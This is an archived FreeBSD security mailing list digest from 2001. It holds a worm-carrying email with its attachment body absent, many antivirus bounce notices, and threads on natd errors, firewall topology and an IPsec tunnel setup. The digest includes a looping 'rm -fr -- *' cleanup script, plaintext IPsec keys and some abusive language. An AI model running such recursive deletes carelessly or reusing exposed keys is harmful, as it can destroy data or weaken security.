Sent by : jflowers@ezo.net
Address : jflowers@ezo.net
To      : security@FreeBSD.ORG
Subject : Interesting stuff - check it hehe ;-)
Date    : 23/11/2001 09:17

Exchange has detected a virus in your message. This has been dealt with accordingly.

File  :
Virus : W32/Aliz - Disinfected

http://www.pandasoftware.com

**********************************************
Visit our website at www.aht.org.uk
**********************************************

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal
For more information please visit www.marshalsoftware.com
#####################################################################################

From owner-freebsd-security Fri Nov 23 1:20:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dispatch1.mail.gxn.net (dispatch1.mail.gxn.net [195.224.255.102]) by hub.freebsd.org (Postfix) with ESMTP id 2AFCE37B41F for ; Fri, 23 Nov 2001 01:19:54 -0800 (PST)
Received: from [195.224.162.195] (helo=lorean.aht.org.uk ident=hidden-user) by dispatch1 with esmtp (Exim 3.22 #1) id 167CWT-0005Ct-00 for security@freebsd.org; Fri, 23 Nov 2001 09:21:25 +0000
Received: from mail.aht.org.uk (not verified[191.9.206.3]) by lorean.aht.org.uk with MailMarshal (4,2,0,0) id ; Fri, 23 Nov 2001 09:27:52 +0000
Received: by EXCHANGE with Internet Mail Service (5.5.2653.19) id ; Fri, 23 Nov 2001 09:17:17 -0000
Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE>
From: EXCHANGE Panda Antivirus for Exchange Server
To: "'security@FreeBSD.ORG'"
Subject: Virus incident
Date: Fri, 23 Nov 2001 09:17:15 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain

Panda Antivirus has found the following viruses in the message:

Server  : EXCHANGE
Sent by : jflowers@ezo.net
Address : jflowers@ezo.net
To      : security@FreeBSD.ORG
Subject : Interesting stuff - check it hehe ;-)
Date    : 23/11/2001 09:17:14

Exchange has detected a virus in your message. This has been dealt with accordingly.

File  : whatever.exe inside: Interesting stuff - check it hehe ;-)
Virus : W32/Aliz - Ignored

http://www.pandasoftware.com

**********************************************
Visit our website at www.aht.org.uk
**********************************************

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal
For more information please visit www.marshalsoftware.com
#####################################################################################

From owner-freebsd-security Fri Nov 23 1:20:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peony.ezo.net (peony.ezo.net [206.102.130.11]) by hub.freebsd.org (Postfix) with ESMTP id 133DF37B429 for ; Fri, 23 Nov 2001 01:19:29 -0800 (PST)
Received: from localhost (c3-1a119.neo.rr.com [24.93.230.119]) by peony.ezo.net (8.11.0.Beta3/8.11.0.Beta3) with SMTP id fAN9Qw630403 for security@FreeBSD.ORG; Fri, 23 Nov 2001 04:26:59 -0500 (EST)
Message-Id: <200111230926.fAN9Qw630403@peony.ezo.net>
From: jflowers@ezo.net
To: security@FreeBSD.ORG
Subject: some shit to see
Date: Fri,23 Nov 2001 04:20:09 -0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="bound"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.
This is a multi-part message in MIME format.

--bound
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

peace

--bound
Content-Type: audio/x-wav; name="whatever.exe"
Content-Transfer-Encoding: base64
Content-ID:

--bound--

From owner-freebsd-security Fri Nov 23 1:29:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.appliedcard.com (mail.appliedcard.com [207.43.202.218]) by hub.freebsd.org (Postfix) with ESMTP id 875F237B448 for ; Fri, 23 Nov 2001 01:27:04 -0800 (PST)
From: BocaRaton4@appliedcard.com
X-Priority: 3 (Normal)
Date: Fri, 23 Nov 2001 04:26:09 -0500
Subject: Report to Recipient(s)
To: security@FreeBSD.ORG
Message-ID:
X-MIMETrack: Serialize by Router on BocaRaton4/WILM/ACS(Release 5.0.5 |September 22, 2000) at 11/23/2001 04:26:16 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii

Incident Information:-

Originator: owner-freebsd-security@FreeBSD.ORG
Recipients: security@FreeBSD.ORG
Subject: some shit to see

WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned.
From owner-freebsd-security Fri Nov 23 1:30:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp-1.nordnet.fr (smtp-1.nordnet.fr [194.206.126.239]) by hub.freebsd.org (Postfix) with ESMTP id C131737B6A2 for ; Fri, 23 Nov 2001 01:27:35 -0800 (PST)
Received: from pop-3.nordnet.fr (pop-3.nordnet.fr [192.168.164.131]) by smtp-1.nordnet.fr (8.9.0/8.9.0) with ESMTP id KAA19245 for ; Fri, 23 Nov 2001 10:27:21 +0100
From: root@pop-3.nordnet.fr
Received: (from root@localhost) by pop-3.nordnet.fr (8.9.3/8.9.3) id KAA13616 Fri, 23 Nov 2001 10:27:18 +0100
Date: Fri, 23 Nov 2001 10:27:18 +0100
Message-Id: <200111230927.KAA13616@pop-3.nordnet.fr>
To: security@FreeBSD.ORG
Subject: ALERT: VIRUS DETECTED IN A MESSAGE SENT BY owner-freebsd-security@FreeBSD.ORG

V I R U S   A L E R T

Our automatic anti-virus detection system has detected a virus in a message sent to you by jflowers@ezo.net. Delivery of this message has been stopped. Please get in touch with the sender, jflowers@ezo.net, to sort out the problem with them.

************
Is your PC well protected? For effective, self-contained protection, www.securitoo.com/indexml.php is the solution against all known and future viruses.
************
Is your PC really protected ? For the best protection, www.securitoo.com/indexml.php is the solution that will protect your PC from all known viruses and viruses to be.
************

V I R U S   A L E R T

Our anti-virus system has detected a virus in an email sent by jflowers@ezo.net. We have stopped the delivery of this email. We invite you to contact jflowers@ezo.net to solve the problem.
From owner-freebsd-security Fri Nov 23 1:30:20 2001
From: EXCHANGE Panda Antivirus for Exchange Server
To: "'security@FreeBSD.ORG'"
Subject: Virus incident
Date: Fri, 23 Nov 2001 09:27:11 -0000
Message-ID: <13E8590EE45BD411A3460050DA922EE3013630A9@EXCHANGE>

Panda Antivirus has found the following viruses in the message:

Server  : EXCHANGE
Sent by : jflowers@ezo.net
Address : jflowers@ezo.net
To      : security@FreeBSD.ORG
Subject : some shit to see
Date    : 23/11/2001 09:27

Exchange has detected a virus in your message. This has been dealt with accordingly.
File  :
Virus : W32/Aliz - Disinfected

http://www.pandasoftware.com

Visit our website at www.aht.org.uk

This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal. For more information please visit www.marshalsoftware.com

From owner-freebsd-security Fri Nov 23 1:30:28 2001
From: EXCHANGE Panda Antivirus for Exchange Server
To: "'security@FreeBSD.ORG'"
Subject: Virus incident
Date: Fri, 23 Nov 2001 09:27:17 -0000
Message-ID: <13E8590EE45BD411A3460050DA922EE3013630AB@EXCHANGE>

Panda Antivirus has found the following viruses in the message:

Server  : EXCHANGE
Sent by : jflowers@ezo.net
Address : jflowers@ezo.net
To      : security@FreeBSD.ORG
Subject : some shit to see
Date    : 23/11/2001 09:27:16

Exchange has detected a virus in your message. This has been dealt with accordingly.

File  : whatever.exe inside: some shit to see
Virus : W32/Aliz - Ignored

http://www.pandasoftware.com

Visit our website at www.aht.org.uk

From owner-freebsd-security Fri Nov 23 1:31:59 2001
From: Colin Faber
To: security@FreeBSD.ORG
Subject: Re: Virus incident
Date: Fri, 23 Nov 2001 02:31:14 -0700
Message-ID: <3BFE1762.A63EF451@fpsn.net>
References: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE>

VIRUS IN YOUR MAIL, ALERT: VIRUS DETECTED IN A MESSAGE SENT BY, etc. etc. etc.

Okay, can we fix this crap now? Obviously the tards running these MTAs failed to read their documentation before utilizing the software.
I'm growing tired of seeing these messages fly by every time some stupid Outlook user makes it on this list.

From owner-freebsd-security Fri Nov 23 1:34:14 2001
From: ahlstromsmtp/Ahlstrom@notes.ahlstrom.com
Date: Fri, 23 Nov 2001 11:27:02 +0200
Subject: Report to Recipient(s)
To: security@FreeBSD.ORG

Incident Information:-

Originator: owner-freebsd-security@FreeBSD.ORG
Recipients: security@FreeBSD.ORG
Subject: some shit to see

WARNING: The file whatever.exe you received was infected with the W32/Aliz@MM virus. The file attachment was not successfully cleaned.
From owner-freebsd-security Fri Nov 23 1:42:59 2001
From: Bill Fumerola
To: Anthony Atkielski
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: setuid on nethack?
Date: Fri, 23 Nov 2001 03:42:56 -0600
Message-ID: <20011123034256.V81711@elvis.mu.org>
In-Reply-To: <03a801c17399$ba011c30$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:07:42PM +0100
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com>

[ removing x-post to -questions ]

On Thu, Nov 22, 2001 at 10:07:42PM +0100, Anthony Atkielski wrote:
> Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not
> installing this at a bank.

good thing, indeed! if you were installing this at a bank you would clearly be underqualified to understand how to evaluate 3rd party software and the bank would have made a huge mistake in assigning you the task.

the freebsd project provides the ports tree as a build infrastructure, not as a blessed software repository.
while freebsd's ports committers and security officer are very quick to respond to security fixes, often quicker than the software author(s), it would be impossible to audit 6000+ moving targets' worth of install scripts and make glue.

the post you responded to even pointed out that you can build the software as a normal user. only install as root; if you're truly paranoid you only have to examine the install stage for all those secret backdoors.

if you still don't feel warm and fuzzy, consider codine.

--
- bill fumerola / fumerola@yahoo-inc.com / billf@FreeBSD.org / billf@mu.org
- my anger management counselor can beat up your self-affirmation therapist

From owner-freebsd-security Fri Nov 23 1:52:36 2001
From: "Paul F. Wells"
To: security@FreeBSD.ORG
Subject: RE: Virus incident
Date: Fri, 23 Nov 2001 04:52:30 -0500
Message-ID: <9852F4A7EDFA8D449D52239131CBAEE4030BE4@seafoam.wellserv.com>

Just how big of a bigot does one have to be before someone kicks the bigot in his big, fat, fucking head?
-----Original Message-----
From: Colin Faber [mailto:cfaber@fpsn.net]
Sent: Friday, November 23, 2001 4:31 AM
To: security@FreeBSD.ORG
Subject: Re: Virus incident

VIRUS IN YOUR MAIL, ALERT: VIRUS DETECTED IN A MESSAGE SENT BY, etc. etc. etc.

Okay, can we fix this crap now? Obviously the tards running these MTAs failed to read their documentation before utilizing the software.

I'm growing tired of seeing these messages fly by every time some stupid Outlook user makes it on this list.

From owner-freebsd-security Fri Nov 23 1:53:07 2001
From: "Anthony Atkielski"
To: "Bill Fumerola",
Subject: Re: setuid on nethack?
Message-ID: <051901c17404$a03391f0$0a00000a@atkielski.com>
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com> <20011123034256.V81711@elvis.mu.org>
Date: Fri, 23 Nov 2001 10:52:55 +0100

Bill writes:

> if you still don't feel warm and fuzzy,
> consider codine.

What is codine?

From owner-freebsd-security Fri Nov 23 2:07:44 2001
From: Stefan Probst
To: Colin Faber , security@FreeBSD.ORG
Subject: Re: Virus incident
Date: Fri, 23 Nov 2001 16:54:07 +0700
Message-Id: <5.1.0.14.2.20011123165118.0239eb00@MailServer>
In-Reply-To: <3BFE1762.A63EF451@fpsn.net>
References: <13E8590EE45BD411A3460050DA922EE3013630A3@EXCHANGE>

At 02:31 23.11.2001 -0700, Colin Faber wrote:
-------------------------
>
> Okay, can we fix
> this crap now? Obviously the tards running these MTAs
> failed to read their documentation before utilizing the software.
>
> I'm growing tired of seeing these messages fly by every time some stupid
> Outlook user makes it on this list.

You mean somebody spreads an OTD (Outlook Transmitted Disease)?

Stefan

From owner-freebsd-security Fri Nov 23 2:45:09 2001
From: veedee@c7.campus.utcluj.ro
To: freebsd-security@freebsd.org
Subject: Re: fts_print bug?
Date: Fri, 23 Nov 2001 12:45:53 +0200
Message-ID: <20011123124553.A10122@c7.campus.utcluj.ro>
In-Reply-To: <20011123015505.A5165@c7.campus.utcluj.ro>; from veedee@c7.campus.utcluj.ro on Fri, Nov 23, 2001 at 01:55:05AM +0200

On Fri, Nov 23, 2001 at 01:55:05AM +0200, veedee@c7.campus.utcluj.ro wrote:
>
> Does anyone know anything about this?
>
> It didn't work on my box (4.3-RELEASE), but it did make some directories
> which I can't erase anymore...
>
> [#] rm -r 4965/
> rm: fts_read: File name too long

Here's a little command to help remove those created subdirs...

    while true; do
        for i in *; do
            # each level's contents are hoisted one directory up; the subshell
            # makes sure we are back in the parent even when mv fails
            [ -d "$i" ] && ( cd "$i" && mv -f -- * .. )
        done
        # once the tree is shallow enough, rm succeeds and the loop ends
        rm -fr -- * && break
    done

Thanks to tendogz (#freebsd) for providing it...

PS.
Feels kinda funny replying to myself :)

Best regards,
Radu Bogdan Rusu (aka veedee)
C7 Campus Network System Administrator

From owner-freebsd-security Fri Nov 23 3:46:15 2001
From: Peter Ross
Reply-To: Peter Ross
To: freebsd-security@freebsd.org
Subject: natd: failed to write packet back (Permission denied)
Date: Fri, 23 Nov 2001 12:46:04 +0100 (MET)
Message-Id: <200111231146.MAA24434@aprilsonne.pps.de>

Hi,

last month I installed a working (AFAIK ;-) firewall using FreeBSD 4.4, ipfw and natd.

Sometimes I get a message:

> Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission denied)
> Nov 22 17:31:58 tor last message repeated 6 times

There are approximately 30 packets per day causing this message.

I can't find a corresponding message in the ipfw logs.

While my firewall continues to work, my former FreeBSD 3.x firewall stopped in this case from time to time.

Should I be worried?
I hope there isn't a mistake in the ipfw rules..

Thanks for advice
Peter Ross

*******************************************************
Dipl.Inf. Peter Ross                  Mail: petros@pps.de
Presse Programm Service Berlin - Systems administration
*******************************************************

From owner-freebsd-security Fri Nov 23 3:58:58 2001
From: veedee@c7.campus.utcluj.ro
To: Peter Ross
Cc: freebsd-security@freebsd.org
Subject: Re: natd: failed to write packet back (Permission denied)
Date: Fri, 23 Nov 2001 13:59:34 +0200
Message-ID: <20011123135934.A11605@c7.campus.utcluj.ro>
In-Reply-To: <200111231146.MAA24434@aprilsonne.pps.de>; from petros@pps.de on Fri, Nov 23, 2001 at 12:46:04PM +0100

On Fri, Nov 23, 2001 at 12:46:04PM +0100, Peter Ross wrote:
> Hi,
> last month I installed a working (AFAIK ;-) firewall using FreeBSD 4.4, ipfw
> and natd.

Have you considered using ipf/ipnat instead?

> Sometimes I get a message:
> > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission denied)
> > Nov 22 17:31:58 tor last message repeated 6 times
> There are approximately 30 packets per day causing this message.
> I can't find a corresponding message in the ipfw-logs.
> While my firewall continues to work, my former FreeBSD 3.x firewall stopped
> in this case from time to time.
> Should I be worried? I hope there isn't a mistake in the ipfw rules..

Not really. The messages are caused by physical link problems. I get the same messages when the link to my ISP fails from time to time (e.g. it disconnects). It has nothing whatsoever to do with the ipfw rules.

> Thanks for advice
> Peter Ross
>
> *******************************************************
> Dipl.Inf. Peter Ross                  Mail: petros@pps.de
> Presse Programm Service Berlin - Systems administration
> *******************************************************

Hope this helps,
Radu Bogdan Rusu (aka veedee)
C7 Campus Network System Administrator

From owner-freebsd-security Fri Nov 23 4:00:02 2001
From: veedee@c7.campus.utcluj.ro
To: Peter Ross
Cc: freebsd-security@freebsd.org
Subject: Re: natd: failed to write packet back (Permission denied)
Date: Fri, 23 Nov 2001 14:00:56 +0200
Message-ID: <20011123140056.B11605@c7.campus.utcluj.ro>
In-Reply-To: <200111231146.MAA24434@aprilsonne.pps.de>; from petros@pps.de on Fri, Nov 23, 2001 at 12:46:04PM +0100

Uhm, I forgot... aren't we supposed to discuss this on another mailing list? :) Like freebsd-net? Sorries...
Radu Bogdan Rusu (aka veedee)
C7 Campus Network System Administrator

On Fri, Nov 23, 2001 at 12:46:04PM +0100, Peter Ross wrote:
> Hi,
>
> last month I installed a working (AFAIK ;-) firewall using FreeBSD 4.4, ipfw
> and natd.
>
> Sometimes I get a message:
>
> > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission denied)
> > Nov 22 17:31:58 tor last message repeated 6 times
>
> There are approximately 30 packets per day causing this message.
>
> I can't find a corresponding message in the ipfw-logs.
>
> While my firewall continues to work, my former FreeBSD 3.x firewall stopped
> in this case from time to time.
>
> Should I be worried? I hope there isn't a mistake in the ipfw rules..
>
> Thanks for advice
> Peter Ross
>
> *******************************************************
> Dipl.Inf. Peter Ross                  Mail: petros@pps.de
> Presse Programm Service Berlin - Systems administration
> *******************************************************

From owner-freebsd-security Fri Nov 23 4:23:06 2001
From: Giorgos Keramidas
To: Krzysztof Zaraska
Cc: security@FreeBSD.ORG
Subject: Re: Firewall design [was: Re: Best security topology for FreeBSD]
Date: Fri, 23 Nov 2001 12:28:09 +0200
Message-ID: <20011123102809.GA9743@hades.hell.gr>
References: <20011122031739.A226@gohan.cjclark.org>

[ ascii art reordering to cut a few lines of text ]

    Internet --- firewall --- internal
                     |
                    DMZ
    ------------------------------------------------------------
    Internet --- firewall1 --- DMZ --- firewall2 --- internal
    ------------------------------------------------------------

On 2001-11-22 20:55:30, Krzysztof Zaraska wrote:
> Could you please explain why the second design is better? I know it's
> harder to properly construct the correct ruleset for the first topology,
> but what are other problems?

Two levels of firewall; one more barrier for intruders. If the same machine is used for the DMZ and internal firewall, and it is compromised, then both the DMZ and internal networks are wide open.

This however is useless if you use exactly the same hardware/software both for the `external' and `internal' machines and still have two separate machines for the two firewalls. The same exploits/bugs that will let someone in at the external firewall will let him break the internal firewall when the DMZ has been compromised.
But by now we are deep into paranoia territory :)

-giorgos

From owner-freebsd-security Fri Nov 23 4:52:48 2001
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
To: cjclark@alum.mit.edu
Cc: Fernando Germano , security@FreeBSD.ORG
Subject: Re: Best security topology for FreeBSD
In-reply-to: Your message of "Thu, 22 Nov 2001 03:17:39 PST." <20011122031739.A226@gohan.cjclark.org>
Date: Fri, 23 Nov 2001 04:49:46 -0800
Message-Id: <200111231250.fANCoha19105@cwsys.cwsent.com>

In message <20011122031739.A226@gohan.cjclark.org>, "Crist J. Clark" writes:
> It is sad to see this poor design,
>
>     Internet
>        |
>        |
>     Firewall--"DMZ"
>        |
>        |
>     Internal
>
> Used so very, very much these days (I think thanks to several firewall
> vendors pushing this as a standard design).
>
> A much better design, is
>
>     Internet
>        |
>        |
>     Firewall1
>        |
>        |
>     DMZ
>        |
>        |
>     Firewall2
>        |
>        |
>     Internal
>
> (This design is actually where the term "DMZ" comes from since it
> actually looks like one here.)

Given the capability of today's firewalls, packet filtering software and packet filtering capabilities within routers, I don't see what the advantage of the second design would be in 2001. Actually today (2001), the second design is quite dangerous. Sure it protects your internal network, however it is more difficult to contain compromised systems from being used as a launching point to elsewhere on the Internet. If you want the additional protection of security through depth, try this:

    Internet
       |
       |
    Firewall1 -- DMZ
       |
       |
    Firewall2
       |
       |
    Internal

What does this give you? Well, your DMZ can be easily configured to protect not only you but make it difficult to launch attacks from your DMZ. The second firewall is a redundant firewall. If you see any messages in the second firewall's logs, you might want to investigate a possible compromise of your first firewall. Many organisations do this. For example, firewall 1 could be a packet filtering router while firewall 2 could be a firewall with various proxy services, e.g. IP Filter's FTP proxy, or a firewall with NAT capability.
Of course all of this depends on what you're trying to protect and how much you're willing to spend to protect whatever you're trying to protect. For many applications one firewall should be enough. Also, one could set up other firewalls within an internal network to control which hosts within your internal network have access to your most sensitive data, e.g. your financial records.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/Alpha Team    Email:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD
Ministry of Management Services
Province of BC

From owner-freebsd-security Fri Nov 23 5:00:24 2001
From: titus manea
To: freebsd-security@freebsd.org
Subject: Re: natd: failed to write packet back
Date: Fri, 23 Nov 2001 15:00:04 +0200
Message-ID: <20011123150004.A24086@unix.edc.dnttm.ro>
The aliased packet is matching an ipfw deny rule that comes after the divert rule

--
__________________________________________________________________________
Titus Manea | Eastern Digital Inc. Lab owner | http://2edc.com | +40-56-192091

From owner-freebsd-security Fri Nov 23 5:57:05 2001
From: Peter Ross
Reply-To: Peter Ross
To: freebsd-security@freebsd.org
Subject: Re: natd: failed to write packet back
Date: Fri, 23 Nov 2001 14:56:51 +0100 (MET)
Message-Id: <200111231356.OAA07362@aprilsonne.pps.de>

Hi,

> The aliased packet is matching an ipfw deny rule that comes after the
> divert rule

There isn't a matching message in /var/log/security.. All my deny rules are also log rules (including the last "deny log all from any to any") and it seems to work: there are entries caused by (other) denied packets.
Peter Ross

From owner-freebsd-security Fri Nov 23 10: 8:52 2001
From: Paul Miseiko
To: Peter Ross
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: natd: failed to write packet back (Permission denied)
Date: Fri, 23 Nov 2001 13:08:27 -0500 (EST)

I get that message sometimes myself. In my case it has to do with my insane firewall. Between the NATd and the Internal Network, all proto and port ranges are passed/allowed. While, between the NATd and the External Network (internet) very few outbound and even fewer inbound port(s) are allowed. If I drop all my firewall rules and just do diverting and passing of all traffic between all interfaces the error goes away; however, due to my paranoid nature I'll be living with that error instead (*^_^*)

Paul Miseiko /\/ esoteric@EFNet /\/ http://teardrop.ca

On Fri, 23 Nov 2001, Peter Ross wrote:

> Hi,
>
> last month I installed a working (AFAIK;-) firewall using FreeBSD 4.4, ipfw
> and natd.
>
> Sometimes I get a message:
>
> > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission
> > denied)
> > Nov 22 17:31:58 tor last message repeated 6 times
>
> There are approximately 30 packets per day causing this message.
>
> I can't find a corresponding message in the ipfw-logs.
>
> While my firewall continues to work, my former FreeBSD 3.x firewall stopped
> in this case from time to time.
>
> Should I be worried? I hope there isn't a mistake in the ipfw rules..
>
> Thanks for advice
> Peter Ross
>
> *******************************************************
> Dipl.Inf. Peter Ross                  Mail: petros@pps.de
> Presse Programm Service Berlin - Systems administration
> *******************************************************

From owner-freebsd-security Fri Nov 23 10:47:22 2001
From: Peter Pentchev
To: security@FreeBSD.org
Subject: IPsec tunnel (manual keying) configuration problem
Date: Fri, 23 Nov 2001 20:44:44 +0200

Hi,

I'm having an IPsec configuration problem, whereby the two endpoints tunnelling two LANs fail to see packets to their own "internal" addresses.

One of the hosts, the so-called 'portal', is a two-NIC machine with a couple of extras:

xl0: flags=8843 mtu 1500
        inet 217.75.128.47 netmask 0xffffff00 broadcast 217.75.128.255
        ether 00:50:04:52:62:d2
        media: Ethernet 100baseTX
        status: active
xl1: flags=8843 mtu 1500
        inet 217.75.134.1 netmask 0xffffffc0 broadcast 217.75.134.63
        inet 217.75.134.11 netmask 0xffffffff broadcast 217.75.134.11
        inet6 3ffe:400:10c0::1 prefixlen 64
        ether 00:04:76:18:65:aa
        media: Ethernet autoselect (100baseTX )
        status: active
lo0: flags=8049 mtu 16384
        inet6 ::1 prefixlen 128
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
        inet 127.0.0.1 netmask 0xff000000
ppp0: flags=8010 mtu 1500
sl0: flags=c010 mtu 552
faith0: flags=8001 mtu 1500
stf0: flags=1 mtu 1280
gif1: flags=8051 mtu 1280
        tunnel inet 217.75.134.1 --> 217.75.128.46
gif2: flags=8051 mtu 1280
        tunnel inet 217.75.134.1 --> 128.176.191.66
tun0: flags=8051 mtu 1524
        inet 172.16.32.5 --> 172.16.32.1 netmask 0xffff0000
        Opened by PID 190
tun1: flags=8010 mtu 1500
-------- end of ifconfig.portal

At the time of the problem, its routing table read:

Routing tables

Internet:
Destination        Gateway            Flags     Refs     Use  Netif Expire
default            217.75.128.1       UGSc        4    14141    xl0
127.0.0.1          127.0.0.1          UH          0        0    lo0
172.16/12          172.16.32.1        UGSc        1    23267   tun0
172.16.32.1        172.16.32.5        UH          2        0   tun0
217.75.128         link#1             UC          5        0    xl0
217.75.128.1       0:1:42:66:cd:0     UHLW        3        0    xl0   1188
217.75.128.2       0:50:4:57:e:c5     UHLW        0       34    xl0   1143
217.75.128.9       0:50:da:51:16:60   UHLW        1      796    xl0   1157
217.75.128.21      0:10:7b:14:4c:74   UHLW        2        0    xl0    962
217.75.128.252     0:60:8c:cb:43:c7   UHLW        0       76    xl0   1002
217.75.134.0       ff:ff:ff:ff:ff:ff  UHLWb       0        6    xl1 =>
217.75.134/26      link#2             UC          7        0    xl1
217.75.134.1       0:4:76:18:65:aa    UHLW        0        3    lo0
217.75.134.9       0:4:76:21:d9:76    UHLW        0     3505    xl1   1151
217.75.134.10      0:1:2:1c:7e:2      UHLW        0     9945    xl1    830
217.75.134.11/32   link#2             UC          0        0    xl1
217.75.134.13      0:1:2:1c:7e:2      UHLW        0    26948    xl1    816
217.75.134.18      0:1:2:1c:7e:2      UHLW        0       88    xl1     18
217.75.134.63      ff:ff:ff:ff:ff:ff  UHLWb       0        4    xl1
217.75.134.64/29   link#2             UCSc        1        0    xl1
217.75.134.72/29   217.75.130.66      UGSc        0      280    xl0
217.75.134.96/27   217.75.128.21      UGSc        1    61926    xl0
------------ end of netstat -rnfinet for portal

The other host, called 'vn', has only one network card:

xl0: flags=8943 mtu 1500
        inet 192.168.9.1 netmask 0xffffff00 broadcast 192.168.9.255
        inet 217.75.130.66 netmask 0xfffffffc broadcast 217.75.130.67
        inet 192.168.9.2 netmask 0xffffffff broadcast 192.168.9.2
        inet 217.75.134.73 netmask 0xfffffff8 broadcast 217.75.134.79
        ether 00:04:76:9e:d8:a7
        media: Ethernet autoselect (100baseTX )
        status: active
lo0: flags=8049 mtu 16384
        inet6 ::1 prefixlen 128
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
        inet 127.0.0.1 netmask 0xff000000
----------- end of ifconfig.vn

And at the time of the problem, its routing table was:

Routing tables

Internet:
Destination        Gateway            Flags     Refs     Use  Netif Expire
127.0.0.1          127.0.0.1          UH          0        0    lo0
192.168.9          link#1             UC          2        0    xl0
192.168.9.1        0:4:76:9e:d8:a7    UHLW        0       10    lo0
192.168.9.2        0:4:76:9e:d8:a7    UHLW        1       46    lo0 =>
192.168.9.2/32     link#1             UC          1        0    xl0
192.168.9.13       0:e0:18:18:f2:e    UHLW        0     5436    xl0    943
217.75.128.47      217.75.130.65      UGHS        7    10463    xl0
217.75.130.64/30   link#1             UC          1        0    xl0
217.75.130.65      0:1:42:3:4e:e4     UHLW        1      294    xl0    176
217.75.134/26      217.75.128.47      UGSc        2      238    xl0
217.75.134.72/29   link#1             UC          2        0    xl0
217.75.134.73      0:4:76:9e:d8:a7    UHLW        1       17    lo0
217.75.134.74      0:e0:18:18:f2:e    UHLW        1      148    xl0    294
--------------- end of netstat -rnfinet for vn

The IPsec configuration files (fed to setkey -c) are:

---- portal:
# Start in the clear: flush all rules
flush ;
spdflush ;
#
# Regional offices
#
# - Varna
#
spdadd 217.75.134.0/26 217.75.134.72/29 any -P out ipsec
        ah/tunnel/217.75.128.47-217.75.130.66/require ;
spdadd 217.75.134.72/29 217.75.134.0/26 any -P in ipsec
        ah/tunnel/217.75.130.66-217.75.128.47/require ;
add 217.75.128.47 217.75.130.66 ah-old 0x100103 -m any -A keyed-md5 "a 16char pass :P" ;
add 217.75.130.66 217.75.128.47 ah-old 0x100104 -m any -A keyed-md5 "another password" ;

---- vn:
# Flush all rules
flush ;
spdflush ;
#
# The NOC at Bulgaria Online
#
spdadd 217.75.134.72/29 217.75.134.0/26 any -P out ipsec
        ah/tunnel/217.75.130.66-217.75.128.47/require ;
spdadd 217.75.134.0/26 217.75.134.72/29 any -P in ipsec
        ah/tunnel/217.75.128.47-217.75.130.66/require ;
add 217.75.130.66 217.75.128.47 ah-old 0x100104 -m any -A keyed-md5 "another password" ;
add 217.75.128.47 217.75.130.66 ah-old 0x100103 -m any -A keyed-md5 "a 16char pass :P" ;
---- end of IPsec config

Now for the problem itself :)

After setting up the IPsec connection, the situation is as follows:

- 217.75.134.74 (behind vn) to 217.75.134.10 (behind portal)   OK
- 217.75.134.74 (behind vn) to 217.75.134.1 (portal itself)    FAIL
- 217.75.134.73 (vn itself) to 217.75.134.10 (behind portal)   FAIL
- 217.75.134.73 (vn itself) to 217.75.134.1 (portal itself)    FAIL

Logs from 'tcpdump -nli xl0 -s 1500 host 217.75.128.47' run on vn:

-------- host behind vn to host behind portal (OK)
tcpdump: listening on xl0
20:25:35.441768 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x9bc32f2d): 217.75.134.74.1109 > 217.75.134.10.22: S [tcp sum ok] 4036805732:4036805732(0) win 16384 (DF) [tos 0x10] (ttl 63, id 1130, len 60) [tos 0x10] (ttl 64, id 299, len 104, bad cksum 0!)
20:25:35.458566 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0xd8cf8cd6): 217.75.134.10.22 > 217.75.134.74.1109: S [tcp sum ok] 3978490178:3978490178(0) ack 4036805733 win 17376 (DF) (ttl 63, id 55805, len 60) (ttl 61, id 234, len 104)
20:25:35.458796 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x650382ec): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) [tos 0x10] (ttl 63, id 3364, len 52) [tos 0x10] (ttl 64, id 300, len 96, bad cksum 0!)
